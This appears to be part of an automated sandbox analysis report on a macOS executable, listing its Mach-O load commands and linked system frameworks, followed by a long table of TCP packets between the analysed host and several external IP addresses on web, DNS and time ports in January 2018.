dylinker_command

Name	Value
name	12
Data	/usr/lib/dyld

uuid_command

Name	Value
uuid	300aca14e34b3e2d88eb0c2db0ed159c

version_min_command

Name	Value
version	657408
reserved	658432

source_version_command

Name	Value
version	0

entry_point_command

Name	Value
stacksize	0
entryoff	19417

dylib_command

Name	Value
compatibility_version	0.1.0
timestamp	Thu Jan 01 01:00:02 1970
name	24
current_version	1280.51.1
Data	/usr/lib/libc++.1.dylib

dylib_command

Name	Value
compatibility_version	0.1.0
timestamp	Thu Jan 01 01:00:02 1970
name	24
current_version	520.1.0
Data	/usr/lib/libz.1.dylib

dylib_command

Name	Value
compatibility_version	0.44.1
timestamp	Thu Jan 01 01:00:02 1970
name	24
current_version	16128.69.5
Data	/System/Library/Frameworks/Foundation.framework/Versions/C/Foundation

dylib_command

Name	Value
compatibility_version	0.1.0
timestamp	Thu Jan 01 01:00:02 1970
name	24
current_version	0.228.0
Data	/usr/lib/libobjc.A.dylib

dylib_command

Name	Value
compatibility_version	0.1.0
timestamp	Thu Jan 01 01:00:02 1970
name	24
current_version	12802.214.4
Data	/usr/lib/libSystem.B.dylib

dylib_command

Name	Value
compatibility_version	0.45.0
timestamp	Thu Jan 01 01:00:02 1970
name	24
current_version	21096.224.5
Data	/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit

dylib_command

Name	Value
compatibility_version	0.1.0
timestamp	Thu Jan 01 01:00:02 1970
name	24
current_version	0.48.0
Data	/System/Library/Frameworks/ApplicationServices.framework/Versions/A/ApplicationServices

dylib_command

Name	Value
compatibility_version	0.1.0
timestamp	Thu Jan 01 01:00:02 1970
name	24
current_version	1042.43.3
Data	/System/Library/Frameworks/CFNetwork.framework/Versions/A/CFNetwork

dylib_command

Name	Value
compatibility_version	0.150.0
timestamp	Thu Jan 01 01:00:02 1970
name	24
current_version	16384.69.5
Data	/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation

dylib_command

Name	Value
compatibility_version	0.64.0
timestamp	Thu Jan 01 01:00:02 1970
name	24
current_version	5632.46.4
Data	/System/Library/Frameworks/CoreGraphics.framework/Versions/A/CoreGraphics

dylib_command

Name	Value
compatibility_version	0.1.0
timestamp	Thu Jan 01 01:00:02 1970
name	24
current_version	4864.7.3
Data	/System/Library/Frameworks/CoreServices.framework/Versions/A/CoreServices

dylib_command

Name	Value
compatibility_version	0.1.0
timestamp	Thu Jan 01 01:00:02 1970
name	24
current_version	0.19.1
Data	/System/Library/Frameworks/IOKit.framework/Versions/A/IOKit

dylib_command

Name	Value
compatibility_version	0.1.0
timestamp	Thu Jan 01 01:00:02 1970
name	24
current_version	13057.120.3
Data	/System/Library/Frameworks/SystemConfiguration.framework/Versions/A/SystemConfiguration

linkedit_data_command

Name	Value
dataoff	437168
datassize	1496

linkedit_data_command

Name	Value
dataoff	438664
datassize	8

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 16, 2018 10:38:28.495457888 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:28.495830059 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:28.512610912 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:28.512631893 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:28.517251015 MEZ	49191	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:28.517293930 MEZ	443	49191	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:28.517833948 MEZ	49191	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:28.529958963 MEZ	49191	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:28.529979944 MEZ	443	49191	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:28.702174902 MEZ	49192	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:28.702208996 MEZ	443	49192	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:28.702867031 MEZ	49192	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:28.704881907 MEZ	49192	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:28.704902887 MEZ	443	49192	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:29.135426044 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:29.135977983 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:29.392107964 MEZ	443	49191	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:29.392664909 MEZ	49191	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:29.453325987 MEZ	443	49191	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:29.453691006 MEZ	49191	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:29.465013027 MEZ	443	49192	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:29.465497971 MEZ	49192	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:29.479163885 MEZ	49191	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:29.479202032 MEZ	443	49191	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:29.479254961 MEZ	49191	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:29.479266882 MEZ	443	49191	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:29.479273081 MEZ	49191	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:29.479284048 MEZ	443	49191	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:29.489674091 MEZ	443	49192	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:29.490376949 MEZ	49192	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:29.504399061 MEZ	49192	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:29.504420996 MEZ	443	49192	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:29.504453897 MEZ	49192	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:29.504462004 MEZ	443	49192	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:29.504484892 MEZ	49192	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:29.504492998 MEZ	443	49192	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:30.187161922 MEZ	443	49191	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:30.187697887 MEZ	49191	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:30.188889980 MEZ	49191	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:30.188913107 MEZ	443	49191	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:30.210139036 MEZ	57875	53	192.168.0.53	8.8.8.8
Jan 16, 2018 10:38:30.257009029 MEZ	443	49192	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:30.257494926 MEZ	49192	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:30.258661032 MEZ	49192	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:30.258682013 MEZ	443	49192	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:30.612297058 MEZ	53	57875	8.8.8.8	192.168.0.53
Jan 16, 2018 10:38:30.730536938 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:30.730557919 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:30.800291061 MEZ	443	49191	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:30.800935030 MEZ	49191	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:31.316409111 MEZ	443	49192	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:31.316910028 MEZ	49192	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:31.327824116 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:31.328321934 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:32.109383106 MEZ	56351	53	192.168.0.53	8.8.8.8
Jan 16, 2018 10:38:32.109441996 MEZ	53	56351	8.8.8.8	192.168.0.53
Jan 16, 2018 10:38:32.115458965 MEZ	53017	53	192.168.0.53	8.8.8.8
Jan 16, 2018 10:38:32.115931034 MEZ	63638	53	192.168.0.53	8.8.8.8
Jan 16, 2018 10:38:32.479837894 MEZ	53	53017	8.8.8.8	192.168.0.53
Jan 16, 2018 10:38:32.683762074 MEZ	53	63638	8.8.8.8	192.168.0.53
Jan 16, 2018 10:38:32.906513929 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:32.906542063 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:33.300405979 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:33.300728083 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:33.324394941 MEZ	123	123	192.168.0.53	17.253.54.125
Jan 16, 2018 10:38:33.936409950 MEZ	80	49190	72.21.91.29	192.168.0.53
Jan 16, 2018 10:38:33.936995983 MEZ	49190	80	192.168.0.53	72.21.91.29
Jan 16, 2018 10:38:35.064308882 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:35.064333916 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:35.712307930 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:35.712666988 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:35.750128984 MEZ	56806	53	192.168.0.53	8.8.8.8
Jan 16, 2018 10:38:36.481611013 MEZ	53	56806	8.8.8.8	192.168.0.53
Jan 16, 2018 10:38:36.482770920 MEZ	49196	80	192.168.0.53	104.31.80.139
Jan 16, 2018 10:38:36.482812881 MEZ	80	49196	104.31.80.139	192.168.0.53
Jan 16, 2018 10:38:36.483573914 MEZ	49196	80	192.168.0.53	104.31.80.139
Jan 16, 2018 10:38:36.485268116 MEZ	49196	80	192.168.0.53	104.31.80.139
Jan 16, 2018 10:38:36.485285997 MEZ	80	49196	104.31.80.139	192.168.0.53
Jan 16, 2018 10:38:36.485536098 MEZ	49196	80	192.168.0.53	104.31.80.139
Jan 16, 2018 10:38:36.485548973 MEZ	80	49196	104.31.80.139	192.168.0.53
Jan 16, 2018 10:38:37.105518103 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:37.105540037 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:37.335010052 MEZ	80	49196	104.31.80.139	192.168.0.53
Jan 16, 2018 10:38:37.335021019 MEZ	80	49196	104.31.80.139	192.168.0.53
Jan 16, 2018 10:38:37.335489988 MEZ	49196	80	192.168.0.53	104.31.80.139
Jan 16, 2018 10:38:37.360729933 MEZ	49196	80	192.168.0.53	104.31.80.139
Jan 16, 2018 10:38:37.360810995 MEZ	80	49196	104.31.80.139	192.168.0.53
Jan 16, 2018 10:38:37.361323118 MEZ	49196	80	192.168.0.53	104.31.80.139
Jan 16, 2018 10:38:37.363715887 MEZ	49197	80	192.168.0.53	104.31.80.139
Jan 16, 2018 10:38:37.363763094 MEZ	80	49197	104.31.80.139	192.168.0.53
Jan 16, 2018 10:38:37.364335060 MEZ	49197	80	192.168.0.53	104.31.80.139
Jan 16, 2018 10:38:37.366035938 MEZ	49197	80	192.168.0.53	104.31.80.139
Jan 16, 2018 10:38:37.366056919 MEZ	80	49197	104.31.80.139	192.168.0.53
Jan 16, 2018 10:38:37.366321087 MEZ	49197	80	192.168.0.53	104.31.80.139
Jan 16, 2018 10:38:37.366333961 MEZ	80	49197	104.31.80.139	192.168.0.53
Jan 16, 2018 10:38:37.854811907 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:37.855370045 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:38.219822884 MEZ	80	49197	104.31.80.139	192.168.0.53
Jan 16, 2018 10:38:38.219834089 MEZ	80	49197	104.31.80.139	192.168.0.53
Jan 16, 2018 10:38:38.220417976 MEZ	49197	80	192.168.0.53	104.31.80.139
Jan 16, 2018 10:38:38.221458912 MEZ	49197	80	192.168.0.53	104.31.80.139
Jan 16, 2018 10:38:38.221518993 MEZ	80	49197	104.31.80.139	192.168.0.53
Jan 16, 2018 10:38:38.222062111 MEZ	49197	80	192.168.0.53	104.31.80.139
Jan 16, 2018 10:38:38.224977970 MEZ	49198	80	192.168.0.53	104.31.80.139
Jan 16, 2018 10:38:38.225011110 MEZ	80	49198	104.31.80.139	192.168.0.53
Jan 16, 2018 10:38:38.225564957 MEZ	49198	80	192.168.0.53	104.31.80.139
Jan 16, 2018 10:38:38.227031946 MEZ	49198	80	192.168.0.53	104.31.80.139
Jan 16, 2018 10:38:38.227047920 MEZ	80	49198	104.31.80.139	192.168.0.53
Jan 16, 2018 10:38:38.227294922 MEZ	49198	80	192.168.0.53	104.31.80.139
Jan 16, 2018 10:38:38.227308035 MEZ	80	49198	104.31.80.139	192.168.0.53
Jan 16, 2018 10:38:39.037847042 MEZ	80	49198	104.31.80.139	192.168.0.53
Jan 16, 2018 10:38:39.037861109 MEZ	80	49198	104.31.80.139	192.168.0.53
Jan 16, 2018 10:38:39.038592100 MEZ	49198	80	192.168.0.53	104.31.80.139
Jan 16, 2018 10:38:39.231729984 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:39.231755018 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:39.257999897 MEZ	80	49198	104.31.80.139	192.168.0.53
Jan 16, 2018 10:38:39.258507967 MEZ	49198	80	192.168.0.53	104.31.80.139
Jan 16, 2018 10:38:39.259450912 MEZ	49198	80	192.168.0.53	104.31.80.139
Jan 16, 2018 10:38:39.259516001 MEZ	80	49198	104.31.80.139	192.168.0.53
Jan 16, 2018 10:38:39.260143995 MEZ	49198	80	192.168.0.53	104.31.80.139
Jan 16, 2018 10:38:39.596726894 MEZ	65226	53	192.168.0.53	82.163.143.135
Jan 16, 2018 10:38:39.596867085 MEZ	53	65226	82.163.143.135	192.168.0.53
Jan 16, 2018 10:38:39.597529888 MEZ	65226	53	192.168.0.53	82.163.142.137
Jan 16, 2018 10:38:39.597626925 MEZ	53	65226	82.163.142.137	192.168.0.53
Jan 16, 2018 10:38:39.597929001 MEZ	50111	53	192.168.0.53	82.163.143.135
Jan 16, 2018 10:38:39.597970009 MEZ	53	50111	82.163.143.135	192.168.0.53
Jan 16, 2018 10:38:40.078402996 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:40.078896999 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:40.114228010 MEZ	57717	53	192.168.0.53	82.163.143.135
Jan 16, 2018 10:38:40.116482019 MEZ	62127	53	192.168.0.53	82.163.143.135
Jan 16, 2018 10:38:40.118319988 MEZ	50145	53	192.168.0.53	82.163.143.135
Jan 16, 2018 10:38:40.121865034 MEZ	59764	53	192.168.0.53	82.163.143.135
Jan 16, 2018 10:38:40.548860073 MEZ	62965	53	192.168.0.53	82.163.143.135
Jan 16, 2018 10:38:40.841768026 MEZ	53	57717	82.163.143.135	192.168.0.53
Jan 16, 2018 10:38:41.007045984 MEZ	53	62127	82.163.143.135	192.168.0.53
Jan 16, 2018 10:38:41.063930988 MEZ	53	50145	82.163.143.135	192.168.0.53
Jan 16, 2018 10:38:41.188694954 MEZ	59764	53	192.168.0.53	82.163.143.135
Jan 16, 2018 10:38:41.190223932 MEZ	53	59764	82.163.143.135	192.168.0.53
Jan 16, 2018 10:38:41.223583937 MEZ	52922	53	192.168.0.53	82.163.143.135
Jan 16, 2018 10:38:41.347417116 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:41.347440004 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:41.392683029 MEZ	53	62965	82.163.143.135	192.168.0.53
Jan 16, 2018 10:38:41.926094055 MEZ	53	59764	82.163.143.135	192.168.0.53
Jan 16, 2018 10:38:42.070797920 MEZ	53	52922	82.163.143.135	192.168.0.53
Jan 16, 2018 10:38:42.071732998 MEZ	49200	80	192.168.0.53	104.28.13.190
Jan 16, 2018 10:38:42.071768999 MEZ	80	49200	104.28.13.190	192.168.0.53
Jan 16, 2018 10:38:42.072567940 MEZ	49200	80	192.168.0.53	104.28.13.190
Jan 16, 2018 10:38:42.074453115 MEZ	49200	80	192.168.0.53	104.28.13.190
Jan 16, 2018 10:38:42.074471951 MEZ	80	49200	104.28.13.190	192.168.0.53
Jan 16, 2018 10:38:42.184029102 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:42.184545994 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:42.817600012 MEZ	80	49200	104.28.13.190	192.168.0.53
Jan 16, 2018 10:38:42.817609072 MEZ	80	49200	104.28.13.190	192.168.0.53
Jan 16, 2018 10:38:42.818187952 MEZ	49200	80	192.168.0.53	104.28.13.190
Jan 16, 2018 10:38:42.872332096 MEZ	80	49200	104.28.13.190	192.168.0.53
Jan 16, 2018 10:38:42.872915030 MEZ	49200	80	192.168.0.53	104.28.13.190
Jan 16, 2018 10:38:42.873908043 MEZ	49200	80	192.168.0.53	104.28.13.190
Jan 16, 2018 10:38:42.873991966 MEZ	80	49200	104.28.13.190	192.168.0.53
Jan 16, 2018 10:38:42.874522924 MEZ	49200	80	192.168.0.53	104.28.13.190
Jan 16, 2018 10:38:42.876209021 MEZ	54507	53	192.168.0.53	82.163.143.135
Jan 16, 2018 10:38:43.459681988 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:43.459707975 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:43.570421934 MEZ	53	54507	82.163.143.135	192.168.0.53
Jan 16, 2018 10:38:43.571280956 MEZ	49201	80	192.168.0.53	104.27.134.218
Jan 16, 2018 10:38:43.571336031 MEZ	80	49201	104.27.134.218	192.168.0.53
Jan 16, 2018 10:38:43.571891069 MEZ	49201	80	192.168.0.53	104.27.134.218
Jan 16, 2018 10:38:43.573754072 MEZ	49201	80	192.168.0.53	104.27.134.218
Jan 16, 2018 10:38:43.573772907 MEZ	80	49201	104.27.134.218	192.168.0.53
Jan 16, 2018 10:38:44.338212967 MEZ	80	49201	104.27.134.218	192.168.0.53
Jan 16, 2018 10:38:44.338227987 MEZ	80	49201	104.27.134.218	192.168.0.53
Jan 16, 2018 10:38:44.338785887 MEZ	49201	80	192.168.0.53	104.27.134.218
Jan 16, 2018 10:38:44.340049982 MEZ	49201	80	192.168.0.53	104.27.134.218
Jan 16, 2018 10:38:44.340171099 MEZ	80	49201	104.27.134.218	192.168.0.53
Jan 16, 2018 10:38:44.340754986 MEZ	49201	80	192.168.0.53	104.27.134.218
Jan 16, 2018 10:38:44.342609882 MEZ	49202	80	192.168.0.53	104.28.13.190
Jan 16, 2018 10:38:44.342668056 MEZ	80	49202	104.28.13.190	192.168.0.53
Jan 16, 2018 10:38:44.343724966 MEZ	49202	80	192.168.0.53	104.28.13.190
Jan 16, 2018 10:38:44.345383883 MEZ	49202	80	192.168.0.53	104.28.13.190
Jan 16, 2018 10:38:44.345405102 MEZ	80	49202	104.28.13.190	192.168.0.53
Jan 16, 2018 10:38:44.477978945 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:44.478610992 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:45.302794933 MEZ	80	49202	104.28.13.190	192.168.0.53
Jan 16, 2018 10:38:45.302805901 MEZ	80	49202	104.28.13.190	192.168.0.53
Jan 16, 2018 10:38:45.303338051 MEZ	49202	80	192.168.0.53	104.28.13.190
Jan 16, 2018 10:38:45.305030107 MEZ	49202	80	192.168.0.53	104.28.13.190
Jan 16, 2018 10:38:45.305094004 MEZ	80	49202	104.28.13.190	192.168.0.53
Jan 16, 2018 10:38:45.305697918 MEZ	49202	80	192.168.0.53	104.28.13.190
Jan 16, 2018 10:38:45.572709084 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:45.572732925 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:46.344804049 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:46.345326900 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:47.705620050 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:47.705643892 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:48.352015972 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:48.352549076 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:49.808871031 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:49.808897018 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:50.313086033 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:50.313602924 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:51.901590109 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:51.901609898 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:52.355698109 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:52.356184006 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:53.693825006 MEZ	49190	80	192.168.0.53	72.21.91.29
Jan 16, 2018 10:38:53.693854094 MEZ	80	49190	72.21.91.29	192.168.0.53
Jan 16, 2018 10:38:54.005795956 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:54.005820990 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:54.563170910 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:54.563838005 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:56.108951092 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:56.108979940 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:56.583056927 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:56.583508968 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:56.854804993 MEZ	49184	443	192.168.0.53	23.45.112.74
Jan 16, 2018 10:38:56.854892015 MEZ	443	49184	23.45.112.74	192.168.0.53
Jan 16, 2018 10:38:56.855150938 MEZ	49184	443	192.168.0.53	23.45.112.74
Jan 16, 2018 10:38:58.194991112 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:38:58.195014000 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:58.667030096 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:38:58.667691946 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:00.343030930 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:00.343055010 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:00.784032106 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:00.784590960 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:02.449940920 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:02.449966908 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:02.963887930 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:02.964428902 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:04.599488974 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:04.599519014 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:05.091592073 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:05.092231989 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:06.745258093 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:06.745282888 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:07.165596962 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:07.166117907 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:08.828758955 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:08.828780890 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:09.316236019 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:09.316829920 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:11.047348976 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:11.047378063 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:11.504631042 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:11.505038023 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:13.147633076 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:13.147654057 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:13.604799986 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:13.605537891 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:15.283921957 MEZ	52805	53	192.168.0.53	82.163.143.135
Jan 16, 2018 10:39:15.309907913 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:15.309931993 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:15.659476995 MEZ	53	52805	82.163.143.135	192.168.0.53
Jan 16, 2018 10:39:15.743515968 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:15.744064093 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:17.469773054 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:17.469801903 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:17.878190041 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:17.878729105 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:19.549875021 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:19.549900055 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:20.077354908 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:20.077850103 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:21.636038065 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:21.636063099 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:22.094731092 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:22.095200062 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:23.752785921 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:23.752808094 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:24.221636057 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:24.222160101 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:25.789092064 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:25.789118052 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:26.447158098 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:26.447531939 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:27.862070084 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:27.862096071 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:28.288945913 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:28.289412975 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:29.870589972 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:29.870615959 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:30.292367935 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:30.293275118 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:30.494515896 MEZ	49192	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:30.494605064 MEZ	443	49192	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:30.495016098 MEZ	49192	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:30.495086908 MEZ	49191	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:30.495168924 MEZ	443	49191	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:30.495440960 MEZ	49191	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:31.991152048 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:31.991179943 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:32.551772118 MEZ	443	49189	23.45.113.221	192.168.0.53
Jan 16, 2018 10:39:32.552283049 MEZ	49189	443	192.168.0.53	23.45.113.221
Jan 16, 2018 10:39:34.010811090 MEZ	49189	443	192.168.0.53	23.45.113.221
